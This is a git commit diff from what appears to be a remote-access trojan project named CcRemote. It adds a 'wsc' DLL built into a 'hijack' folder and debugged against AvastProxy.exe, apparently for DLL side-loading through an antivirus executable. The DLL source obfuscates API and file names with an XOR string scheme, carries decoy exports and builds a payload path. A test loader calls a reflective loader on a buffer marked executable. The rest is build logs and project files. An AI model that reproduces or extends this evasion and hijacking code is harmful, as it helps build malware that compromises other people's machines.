diff --git a/CcMainDll/.vs/CcMainDll/v15/.suo b/CcMainDll/.vs/CcMainDll/v15/.suo
index 4af1ec8..07198b8 100644
Binary files a/CcMainDll/.vs/CcMainDll/v15/.suo and b/CcMainDll/.vs/CcMainDll/v15/.suo differ
diff --git a/CcMainDll/CcMainDll.sln b/CcMainDll/CcMainDll.sln
index 4515cfc..d36bb73 100644
--- a/CcMainDll/CcMainDll.sln
+++ b/CcMainDll/CcMainDll.sln
@@ -7,6 +7,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CcMainDll", "CcMainDll\CcMa
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TestLoadDll", "TestLoadDll\TestLoadDll.vcxproj", "{7FD3FB3F-5E07-4F67-9A94-9A8507044D8B}"
EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wsc", "wsc\wsc.vcxproj", "{ADC02516-39AD-43DE-95F9-1FC836CD34C3}"
+EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
@@ -31,6 +33,14 @@ Global
{7FD3FB3F-5E07-4F67-9A94-9A8507044D8B}.Release|x64.Build.0 = Release|x64
{7FD3FB3F-5E07-4F67-9A94-9A8507044D8B}.Release|x86.ActiveCfg = Release|Win32
{7FD3FB3F-5E07-4F67-9A94-9A8507044D8B}.Release|x86.Build.0 = Release|Win32
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Debug|x64.ActiveCfg = Debug|x64
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Debug|x64.Build.0 = Debug|x64
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Debug|x86.ActiveCfg = Debug|Win32
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Debug|x86.Build.0 = Debug|Win32
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Release|x64.ActiveCfg = Release|x64
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Release|x64.Build.0 = Release|x64
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Release|x86.ActiveCfg = Release|Win32
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
diff --git a/CcMainDll/CcMainDll/CcMainDll.vcxproj.user b/CcMainDll/CcMainDll/CcMainDll.vcxproj.user
index eb8833a..e5f403d 100644
--- a/CcMainDll/CcMainDll/CcMainDll.vcxproj.user
+++ b/CcMainDll/CcMainDll/CcMainDll.vcxproj.user
@@ -5,8 +5,9 @@
WindowsLocalDebugger
- C:\Windows\SysWOW64\rundll32.exe
+ ..\..\bin\server\TestLoadDll.exe
WindowsLocalDebugger
- F:\myapp\CcRemote\bin\server\CcMainDll.dll,MainRun
+
+
\ No newline at end of file
diff --git a/CcMainDll/TestLoadDll/Debug/TestLoadDll.Build.CppClean.log b/CcMainDll/TestLoadDll/Debug/TestLoadDll.Build.CppClean.log
new file mode 100644
index 0000000..e206c4a
--- /dev/null
+++ b/CcMainDll/TestLoadDll/Debug/TestLoadDll.Build.CppClean.log
@@ -0,0 +1,17 @@
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\vc141.pdb
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\vc141.idb
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.obj
+f:\myapp\ccremote\bin\server\testloaddll.exe
+f:\myapp\ccremote\bin\server\testloaddll.ilk
+f:\myapp\ccremote\bin\server\testloaddll.pdb
+f:\myapp\ccremote\bin\server\testloaddll.ipdb
+f:\myapp\ccremote\bin\server\testloaddll.iobj
+f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\cl.command.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\cl.read.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\cl.write.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\link.delete.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\link.read.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\link.write.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\testloaddll.write.1u.tlog
diff --git a/CcMainDll/TestLoadDll/Debug/TestLoadDll.log b/CcMainDll/TestLoadDll/Debug/TestLoadDll.log
index b440f42..667fb10 100644
--- a/CcMainDll/TestLoadDll/Debug/TestLoadDll.log
+++ b/CcMainDll/TestLoadDll/Debug/TestLoadDll.log
@@ -1,6 +1,6 @@
C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
TestLoadDll.cpp
-f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(22): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(23): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
-f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(119): warning C4700: 使用了未初始化的局部变量“lpflOldProtect”
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(124): warning C4700: 使用了未初始化的局部变量“lpflOldProtect”
TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log
index f1eb298..566c1c1 100644
--- a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log
+++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log
@@ -1,14 +1 @@
-f:\myapp\ccremote\ccmaindll\testloaddll\release\vc141.pdb
-f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.obj
-f:\myapp\ccremote\bin\server\testloaddll.exe
-f:\myapp\ccremote\bin\server\testloaddll.pdb
-f:\myapp\ccremote\bin\server\testloaddll.ipdb
-f:\myapp\ccremote\bin\server\testloaddll.iobj
f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
-f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.command.1.tlog
-f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.read.1.tlog
-f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.write.1.tlog
-f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.command.1.tlog
-f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.read.1.tlog
-f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.write.1.tlog
-f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\testloaddll.write.1u.tlog
diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.log b/CcMainDll/TestLoadDll/Release/TestLoadDll.log
index 2271ea3..38a4a3a 100644
--- a/CcMainDll/TestLoadDll/Release/TestLoadDll.log
+++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.log
@@ -2,8 +2,13 @@
TestLoadDll.cpp
f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(23): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(121): warning C4018: “<=”: 有符号/无符号不匹配
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(123): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(132): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(132): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(133): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(133): warning C4309: “初始化”: 截断常量值
正在生成代码
-f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(120): warning C4700: 使用了未初始化的局部变量“lpflOldProtect”
- All 161 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ All 159 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
已完成代码的生成
TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
diff --git a/CcMainDll/TestLoadDll/TestLoadDll.cpp b/CcMainDll/TestLoadDll/TestLoadDll.cpp
index 416654f..e5186ce 100644
--- a/CcMainDll/TestLoadDll/TestLoadDll.cpp
+++ b/CcMainDll/TestLoadDll/TestLoadDll.cpp
@@ -32,6 +32,7 @@ bool InitTestReflectiveLoader()
return false;
+
}
@@ -112,9 +113,12 @@ void loadCcmainDllExp()
}
+
+
+
int main()
{
-
+
InitTestReflectiveLoader();
PDWORD lpflOldProtect;
VirtualProtect(buffer, lSize, PAGE_EXECUTE_READWRITE, lpflOldProtect);
diff --git a/CcMainDll/wsc/Debug/wsc.Build.CppClean.log b/CcMainDll/wsc/Debug/wsc.Build.CppClean.log
new file mode 100644
index 0000000..1b77ab9
--- /dev/null
+++ b/CcMainDll/wsc/Debug/wsc.Build.CppClean.log
@@ -0,0 +1,18 @@
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.pch
+f:\myapp\ccremote\ccmaindll\wsc\debug\vc141.pdb
+f:\myapp\ccremote\ccmaindll\wsc\debug\vc141.idb
+f:\myapp\ccremote\ccmaindll\wsc\debug\pch.obj
+f:\myapp\ccremote\ccmaindll\wsc\debug\dllmain.obj
+f:\myapp\ccremote\bin\hijack\wsc.ilk
+f:\myapp\ccremote\bin\hijack\wsc.dll
+f:\myapp\ccremote\bin\hijack\wsc.pdb
+f:\myapp\ccremote\bin\hijack\wsc.lib
+f:\myapp\ccremote\bin\hijack\wsc.exp
+f:\myapp\ccremote\ccmaindll\wsc\..\..\bin\hijack\wsc.dll
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.command.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.read.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.write.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.read.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.write.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\wsc.write.1u.tlog
diff --git a/CcMainDll/wsc/Debug/wsc.log b/CcMainDll/wsc/Debug/wsc.log
new file mode 100644
index 0000000..30edfb5
--- /dev/null
+++ b/CcMainDll/wsc/Debug/wsc.log
@@ -0,0 +1,13 @@
+C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
+ pch.cpp
+ dllmain.cpp
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(9): warning C4018: “<=”: 有符号/无符号不匹配
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(11): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4309: “初始化”: 截断常量值
+ 正在创建库 ..\..\bin\hijack\wsc.lib 和对象 ..\..\bin\hijack\wsc.exp
+ wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll
diff --git a/CcMainDll/wsc/Debug/wsc.tlog/wsc.lastbuildstate b/CcMainDll/wsc/Debug/wsc.tlog/wsc.lastbuildstate
new file mode 100644
index 0000000..bd1e4f2
--- /dev/null
+++ b/CcMainDll/wsc/Debug/wsc.tlog/wsc.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
+Debug|Win32|F:\myapp\CcRemote\CcMainDll\|
diff --git a/CcMainDll/wsc/Release/wsc.Build.CppClean.log b/CcMainDll/wsc/Release/wsc.Build.CppClean.log
new file mode 100644
index 0000000..feb3b92
--- /dev/null
+++ b/CcMainDll/wsc/Release/wsc.Build.CppClean.log
@@ -0,0 +1,17 @@
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.pch
+f:\myapp\ccremote\ccmaindll\wsc\release\vc141.pdb
+f:\myapp\ccremote\ccmaindll\wsc\release\pch.obj
+f:\myapp\ccremote\ccmaindll\wsc\release\dllmain.obj
+f:\myapp\ccremote\ccmaindll\release\wsc.dll
+f:\myapp\ccremote\ccmaindll\release\wsc.pdb
+f:\myapp\ccremote\ccmaindll\release\wsc.lib
+f:\myapp\ccremote\ccmaindll\release\wsc.exp
+f:\myapp\ccremote\ccmaindll\release\wsc.ipdb
+f:\myapp\ccremote\ccmaindll\release\wsc.iobj
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.command.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.read.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.write.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.read.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.write.1.tlog
+f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\wsc.write.1u.tlog
diff --git a/CcMainDll/wsc/Release/wsc.log b/CcMainDll/wsc/Release/wsc.log
new file mode 100644
index 0000000..589efb9
--- /dev/null
+++ b/CcMainDll/wsc/Release/wsc.log
@@ -0,0 +1,7 @@
+ pch.cpp
+ dllmain.cpp
+ 正在创建库 F:\myapp\CcRemote\CcMainDll\Release\wsc.lib 和对象 F:\myapp\CcRemote\CcMainDll\Release\wsc.exp
+ 正在生成代码
+ All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ 已完成代码的生成
+ wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\Release\wsc.dll
diff --git a/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate
new file mode 100644
index 0000000..3f4a20c
--- /dev/null
+++ b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
+Release|Win32|F:\myapp\CcRemote\CcMainDll\|
diff --git a/CcMainDll/wsc/dllmain.cpp b/CcMainDll/wsc/dllmain.cpp
new file mode 100644
index 0000000..4b16d0f
--- /dev/null
+++ b/CcMainDll/wsc/dllmain.cpp
@@ -0,0 +1,118 @@
+// dllmain.cpp : 定义 DLL 应用程序的入口点。
+#include "pch.h"
+
+#define STR_CRY_LENGTH 0 //加密字符串的长度
+char* uncode(char* str)
+{
+ int len = str[0];
+ char * uncodeStr = (char *)operator new(len + 1);
+ for (size_t i = 1; i <= len; i++)
+ {
+ uncodeStr[i - 1] = str[i] ^ (0xCC - i);
+ }
+ uncodeStr[len] = 0x00;
+ return uncodeStr;
+}
+
+
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+ DWORD ul_reason_for_call,
+ LPVOID lpReserved
+ )
+{
+ switch (ul_reason_for_call)
+ {
+ case DLL_PROCESS_ATTACH:
+ MessageBoxA(NULL, "dllmain", "test", NULL);
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
+
+
+extern "C" __declspec(dllexport) void wiohrwiaq ()
+{
+
+}
+
+
+extern "C" __declspec(dllexport) void ioqerbwqiaweplkqpoewq ()
+{
+
+}
+
+extern "C" __declspec(dllexport) void eiwqiothhahndna()
+{
+
+}
+
+
+/*
+为什么C++生成的Dll函数名带有@?如“_Abcd2@4”后面是数字2加@还有个4
+_stdcall调用约定的函数会有@,后面的数字表示参数总共所占字节数,这是因为_stdcall函数需要被调用者清空堆栈,所以需要知道参数所占大小
+_cedcl调用约定的函数没有@及后面的数字,因为_cedcl调用约定的函数由调用者清空堆栈
+*/
+extern "C" __declspec(dllexport) int __stdcall run(HMODULE hLibModule)
+{
+ MessageBoxA(NULL, "hello", "test", NULL);
+ char Str_Kernel32[] = { 0x08,0xa0,0xaf,0xbb,0xa6,0xa2,0xaa,0xf6,0xf6 };
+ char Str_GetMoudleFileNameA[] = { 0x12,0x8c,0xaf,0xbd,0x85,0xa8,0xa2,0xb0,0xa8,0xa6,0x84,0xa8,0xac,0xda,0xf0,0xdc,0xd1,0xde,0xfb };
+ char Str_MainDat[] = { 0x0c,0x97,0x89,0xaa,0xfa,0xff,0xf4,0xf0,0xf2,0xed,0xa6,0xa0,0xb4 };
+
+ char SelfPath[MAX_PATH] = { 0 };
+
+ char* lpKernel32 = uncode(Str_Kernel32);
+ HMODULE MoudleHandle = GetModuleHandleA(lpKernel32); // 解密调用
+ memset(lpKernel32, 0, Str_Kernel32[STR_CRY_LENGTH]);
+ delete lpKernel32;
+
+
+ //声明导出函数类型--导出的TestRun函数
+ typedef DWORD(__stdcall *TestRunT)(
+ _In_opt_ HMODULE hModule,
+ _Out_writes_to_(nSize, ((return < nSize) ? (return +1) : nSize)) LPSTR lpFilename,
+ _In_ DWORD nSize
+ );
+
+
+ char* lpGetMoudleFileName = uncode(Str_GetMoudleFileNameA);
+ TestRunT pGetMoudleFileNameA = (TestRunT)GetProcAddress(MoudleHandle, lpGetMoudleFileName); // 解密调用
+ memset(lpGetMoudleFileName, 0, Str_Kernel32[STR_CRY_LENGTH]);
+ delete lpGetMoudleFileName;
+
+
+ pGetMoudleFileNameA(NULL, SelfPath, MAX_PATH);
+
+ char* FilePath = strrchr(SelfPath, '\\');
+
+ if (FilePath)
+ {
+ *FilePath = 0x00;
+ }
+ else
+ {
+ return 0;
+ }
+
+ char* pMainDat = uncode(Str_MainDat);
+ lstrcatA(SelfPath, pMainDat);
+ memset(pMainDat, 0, Str_Kernel32[STR_CRY_LENGTH]);
+ delete pMainDat;
+
+
+ MessageBoxA(NULL, SelfPath, "test", NULL);
+
+
+ return FreeLibrary(hLibModule);
+}
+
+
+
+extern "C" __declspec(dllexport) void qioewiqj()
+{
+
+}
diff --git a/CcMainDll/wsc/framework.h b/CcMainDll/wsc/framework.h
new file mode 100644
index 0000000..80cbbc9
--- /dev/null
+++ b/CcMainDll/wsc/framework.h
@@ -0,0 +1,5 @@
+#pragma once
+
+#define WIN32_LEAN_AND_MEAN // 从 Windows 头文件中排除极少使用的内容
+// Windows 头文件
+#include
diff --git a/CcMainDll/wsc/pch.cpp b/CcMainDll/wsc/pch.cpp
new file mode 100644
index 0000000..b6fb8f4
--- /dev/null
+++ b/CcMainDll/wsc/pch.cpp
@@ -0,0 +1,5 @@
+// pch.cpp: 与预编译标头对应的源文件
+
+#include "pch.h"
+
+// 当使用预编译的头时,需要使用此源文件,编译才能成功。
diff --git a/CcMainDll/wsc/pch.h b/CcMainDll/wsc/pch.h
new file mode 100644
index 0000000..9660927
--- /dev/null
+++ b/CcMainDll/wsc/pch.h
@@ -0,0 +1,13 @@
+// pch.h: 这是预编译标头文件。
+// 下方列出的文件仅编译一次,提高了将来生成的生成性能。
+// 这还将影响 IntelliSense 性能,包括代码完成和许多代码浏览功能。
+// 但是,如果此处列出的文件中的任何一个在生成之间有更新,它们全部都将被重新编译。
+// 请勿在此处添加要频繁更新的文件,这将使得性能优势无效。
+
+#ifndef PCH_H
+#define PCH_H
+
+// 添加要在此处预编译的标头
+#include "framework.h"
+
+#endif //PCH_H
diff --git a/CcMainDll/wsc/wsc.vcxproj b/CcMainDll/wsc/wsc.vcxproj
new file mode 100644
index 0000000..b04e849
--- /dev/null
+++ b/CcMainDll/wsc/wsc.vcxproj
@@ -0,0 +1,179 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 15.0
+ {ADC02516-39AD-43DE-95F9-1FC836CD34C3}
+ Win32Proj
+ wsc
+ 10.0.17763.0
+
+
+
+ DynamicLibrary
+ true
+ v141
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ v141
+ true
+ MultiByte
+
+
+ DynamicLibrary
+ true
+ v141
+ Unicode
+
+
+ DynamicLibrary
+ false
+ v141
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+ ..\..\bin\hijack
+
+
+ true
+ ..\..\bin\hijack
+
+
+ true
+
+
+ false
+
+
+
+ Use
+ Level3
+ MaxSpeed
+ true
+ true
+ false
+ WIN32;NDEBUG;WSC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+ MultiThreadedDebug
+
+
+ Windows
+ true
+ true
+ true
+ false
+ ..\..\bin\hijack\wsc.dll
+
+
+
+
+ Use
+ Level3
+ Disabled
+ false
+ WIN32;_DEBUG;WSC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+ MultiThreadedDebug
+
+
+ Windows
+ true
+ false
+ ..\..\bin\hijack\wsc.dll
+
+
+
+
+ Use
+ Level3
+ Disabled
+ true
+ _DEBUG;WSC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ false
+
+
+
+
+ Use
+ Level3
+ MaxSpeed
+ true
+ true
+ true
+ NDEBUG;WSC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ true
+ true
+ false
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
\ No newline at end of file
diff --git a/CcMainDll/wsc/wsc.vcxproj.filters b/CcMainDll/wsc/wsc.vcxproj.filters
new file mode 100644
index 0000000..330d314
--- /dev/null
+++ b/CcMainDll/wsc/wsc.vcxproj.filters
@@ -0,0 +1,33 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CcMainDll/wsc/wsc.vcxproj.user b/CcMainDll/wsc/wsc.vcxproj.user
new file mode 100644
index 0000000..274e26b
--- /dev/null
+++ b/CcMainDll/wsc/wsc.vcxproj.user
@@ -0,0 +1,11 @@
+
+
+
+ ..\..\bin\hijack\AvastProxy.exe
+ WindowsLocalDebugger
+
+
+ ..\..\bin\hijack\AvastProxy.exe
+ WindowsLocalDebugger
+
+
\ No newline at end of file
diff --git a/bin/hijack/AvastProxy.exe b/bin/hijack/AvastProxy.exe
new file mode 100644
index 0000000..93410f7
Binary files /dev/null and b/bin/hijack/AvastProxy.exe differ
diff --git a/bin/hijack/wsc.dll b/bin/hijack/wsc.dll
new file mode 100644
index 0000000..bc74589
Binary files /dev/null and b/bin/hijack/wsc.dll differ
diff --git a/bin/hijack/wsc.lib b/bin/hijack/wsc.lib
new file mode 100644
index 0000000..ee09c7a
Binary files /dev/null and b/bin/hijack/wsc.lib differ
diff --git a/bin/server/TestLoadDll.exe b/bin/server/TestLoadDll.exe
index 1be63e4..5af8813 100644
Binary files a/bin/server/TestLoadDll.exe and b/bin/server/TestLoadDll.exe differ
diff --git a/strCodeTest/.vs/strCodeTest/v15/.suo b/strCodeTest/.vs/strCodeTest/v15/.suo
new file mode 100644
index 0000000..6b55bbf
Binary files /dev/null and b/strCodeTest/.vs/strCodeTest/v15/.suo differ
diff --git a/strCodeTest/Debug/strCodeTest.exe b/strCodeTest/Debug/strCodeTest.exe
new file mode 100644
index 0000000..ddb99f9
Binary files /dev/null and b/strCodeTest/Debug/strCodeTest.exe differ
diff --git a/strCodeTest/strCodeTest.sln b/strCodeTest/strCodeTest.sln
new file mode 100644
index 0000000..cb145e9
--- /dev/null
+++ b/strCodeTest/strCodeTest.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.28307.1022
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "strCodeTest", "strCodeTest\strCodeTest.vcxproj", "{BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Debug|x64.ActiveCfg = Debug|x64
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Debug|x64.Build.0 = Debug|x64
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Debug|x86.ActiveCfg = Debug|Win32
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Debug|x86.Build.0 = Debug|Win32
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Release|x64.ActiveCfg = Release|x64
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Release|x64.Build.0 = Release|x64
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Release|x86.ActiveCfg = Release|Win32
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {702339B7-C70C-4AF0-AFEF-5E6AEB03540F}
+ EndGlobalSection
+EndGlobal
diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log b/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log
new file mode 100644
index 0000000..19cc4a2
--- /dev/null
+++ b/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log
@@ -0,0 +1,12 @@
+f:\myapp\ccremote\strcodetest\strcodetest\debug\vc141.pdb
+f:\myapp\ccremote\strcodetest\strcodetest\debug\vc141.idb
+f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.obj
+f:\myapp\ccremote\strcodetest\debug\strcodetest.ilk
+f:\myapp\ccremote\strcodetest\debug\strcodetest.exe
+f:\myapp\ccremote\strcodetest\debug\strcodetest.pdb
+f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.command.1.tlog
+f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.read.1.tlog
+f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.write.1.tlog
+f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.command.1.tlog
+f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.read.1.tlog
